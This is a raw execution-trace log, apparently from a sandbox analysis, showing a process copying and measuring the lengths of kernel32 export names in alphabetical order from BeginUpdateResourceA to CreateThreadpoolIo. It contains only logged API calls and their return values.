[0087.101] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0087.101] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0087.101] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0087.101] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0087.101] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0087.102] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0087.102] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0087.102] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0087.102] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0087.102] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0087.102] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0087.102] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0087.102] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0087.102] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0087.102] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0087.102] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0087.102] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0087.102] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0087.102] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0087.102] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0087.102] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0087.102] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0087.102] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0087.102] lstrlenA (lpString="CANCELIO") returned 8 [0087.102] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0087.102] lstrlenA (lpString="CANCELIOEX") returned 10 [0087.102] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0087.102] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0087.102] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0087.102] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0087.102] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0087.102] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0087.102] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0087.102] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0087.102] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0087.102] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0087.102] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0087.102] lstrlenA (lpString="CHECKELEVATION") returned 14 [0087.102] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0087.102] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0087.102] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0087.103] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0087.103] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0087.103] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0087.103] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0087.103] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0087.103] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0087.103] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0087.103] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0087.103] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0087.103] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0087.103] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0087.103] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0087.103] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0087.103] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0087.103] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0087.103] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0087.103] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0087.103] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0087.103] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0087.103] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0087.103] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0087.103] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0087.103] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0087.103] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0087.103] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0087.103] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0087.103] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0087.103] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0087.103] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0087.103] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0087.103] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0087.103] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0087.103] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0087.103] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0087.103] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0087.103] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0087.103] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0087.104] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0087.104] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0087.104] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0087.104] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0087.104] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0087.104] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0087.104] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0087.104] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0087.104] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0087.104] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0087.104] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0087.104] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0087.104] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0087.104] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0087.104] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0087.104] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0087.104] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0087.104] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0087.104] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0087.104] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0087.104] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0087.104] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0087.104] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0087.104] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0087.104] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0087.104] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0087.104] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0087.104] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0087.104] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0087.104] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0087.104] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0087.104] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0087.104] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0087.104] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0087.104] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0087.104] lstrlenA (lpString="COPYCONTEXT") returned 11 [0087.105] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0087.105] lstrlenA (lpString="COPYFILEA") returned 9 [0087.105] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0087.105] lstrlenA (lpString="COPYFILEEXA") returned 11 [0087.105] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0087.105] lstrlenA (lpString="COPYFILEEXW") returned 11 [0087.105] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0087.105] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0087.105] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0087.105] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0087.105] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0087.105] lstrlenA (lpString="COPYFILEW") returned 9 [0087.105] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0087.105] lstrlenA (lpString="COPYLZFILE") returned 10 [0087.105] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0087.105] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0087.105] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0087.105] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0087.105] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0087.105] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0087.105] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0087.105] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0087.105] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0087.105] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0087.105] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0087.105] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0087.105] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0087.105] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0087.105] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0087.105] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0087.105] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0087.105] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0087.105] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0087.105] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0087.105] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0087.106] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0087.106] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0087.106] lstrlenA (lpString="CREATEEVENTA") returned 12 [0087.106] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0087.106] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0087.106] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0087.106] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0087.106] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0087.106] lstrlenA (lpString="CREATEEVENTW") returned 12 [0087.106] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0087.106] lstrlenA (lpString="CREATEFIBER") returned 11 [0087.106] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0087.106] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0087.106] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0087.106] lstrlenA (lpString="CREATEFILEA") returned 11 [0087.106] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0087.106] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0087.106] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0087.106] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0087.106] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0087.106] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0087.106] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0087.106] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0087.106] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0087.106] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0087.106] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0087.106] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0087.106] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0087.106] lstrlenA (lpString="CREATEFILEW") returned 11 [0087.106] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0087.106] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0087.106] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0087.106] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0087.106] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0087.106] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0087.106] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0087.106] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0087.107] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0087.107] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0087.107] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0087.107] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0087.107] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0087.107] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0087.107] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0087.107] lstrlenA (lpString="CREATEJOBSET") returned 12 [0087.107] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0087.107] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0087.107] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0087.107] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0087.107] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0087.107] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0087.107] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0087.107] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0087.107] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0087.107] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0087.107] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0087.107] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0087.107] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0087.107] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0087.107] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0087.107] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0087.107] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0087.107] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0087.107] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0087.107] lstrlenA (lpString="CREATEPIPE") returned 10 [0087.107] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0087.107] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0087.108] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0087.108] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0087.108] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0087.108] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0087.108] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0087.108] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0087.108] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0087.108] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0087.108] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0087.108] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0087.108] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0087.108] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0087.108] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0087.108] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0087.108] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0087.108] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0087.108] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0087.108] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0087.108] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0087.108] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0087.108] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0087.108] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0087.108] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0087.108] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0087.108] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0087.108] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0087.108] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0087.108] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0087.108] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0087.108] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0087.108] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0087.108] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0087.108] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0087.108] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0087.108] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0087.108] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0087.109] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0087.109] lstrlenA (lpString="CREATETHREAD") returned 12 [0087.109] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0087.109] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0087.109] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0087.109] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0087.109] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") 